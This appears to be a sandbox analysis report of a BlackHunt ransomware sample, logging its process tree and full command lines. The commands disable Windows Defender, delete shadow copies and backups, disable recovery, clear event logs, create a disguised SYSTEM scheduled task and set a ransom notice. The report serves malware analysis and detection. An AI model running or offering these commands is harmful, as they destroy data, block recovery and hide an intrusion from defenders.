5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 108 PID 1520 wrote to memory of 4592 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 108 PID 1520 wrote to memory of 1888 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 111 PID 1520 wrote to memory of 1888 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 111 PID 1520 wrote to memory of 1900 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 114 PID 1520 wrote to memory of 1900 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 114 PID 1520 wrote to memory of 5068 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 116 PID 1520 wrote to memory of 5068 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 116 PID 228 wrote to memory of 1840 228 cmd.exe 115 PID 228 wrote to memory of 1840 228 cmd.exe 115 PID 1520 wrote to memory of 4836 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 119 PID 1520 wrote to memory of 4836 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 119 PID 1520 wrote to memory of 4636 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 118 PID 1520 wrote to memory of 4636 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 118 PID 1520 wrote to memory of 1124 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 123 PID 1520 wrote to memory of 1124 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 123 PID 1520 wrote to memory of 948 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 124 PID 1520 wrote to memory of 948 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 124 PID 1520 wrote to memory of 2780 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 126 PID 1520 wrote to memory of 2780 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 126 PID 1520 wrote to memory of 2736 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 128 PID 1520 wrote to memory of 2736 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 128 PID 1520 wrote to memory of 3500 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 131 PID 1520 wrote to memory of 3500 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 131 PID 1520 wrote to memory of 3816 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 133 PID 1520 wrote to memory of 3816 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 133 PID 5012 wrote to memory of 4232 5012 cmd.exe 132 PID 5012 wrote to memory of 4232 5012 cmd.exe 132 PID 3836 wrote to memory of 1568 3836 cmd.exe 136 PID 3836 wrote to memory of 1568 3836 cmd.exe 136 PID 760 wrote to memory of 4300 760 reg.exe 137 PID 760 wrote to memory of 4300 760 reg.exe 137 PID 1520 wrote to memory of 4284 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 139 PID 1520 wrote to memory of 4284 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 139 PID 5000 wrote to memory of 2388 5000 cmd.exe 138 PID 5000 wrote to memory of 2388 5000 cmd.exe 138 PID 1520 wrote to memory of 532 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 140 PID 1520 wrote to memory of 532 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 140 PID 1520 wrote to memory of 2740 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 145 PID 1520 wrote to memory of 2740 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 145 PID 1520 wrote to memory of 388 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 146 PID 1520 wrote to memory of 388 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 146 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe"C:\Users\Admin\AppData\Local\Temp\5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1520 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:5036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1848
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:736
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3004
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:4592
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:5068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4636
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4836
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1124
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2780
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2736
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3500
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:6840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4284
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:532
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:8692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:10272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:388
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:9300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3268
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:10876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4972
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:10132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe" /F2⤵PID:4808
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe" /F3⤵
- Creates scheduled task(s)
PID:9960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4468
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2524
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:11204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:732
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:216
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:772
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3912
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:10940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4948
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1496
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:8208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3172
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:9112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1632
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:16696
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:16860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:16652
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:16948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:16572
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:16628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:17060
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:16592
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:16532
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:16516
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:7200
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:6612
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:10496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:8820
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:8504
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:9548
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:15120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5828
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:13088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1224
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:15056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:13940
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:10832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:5652
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:14624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2700
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:10080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:6716
-
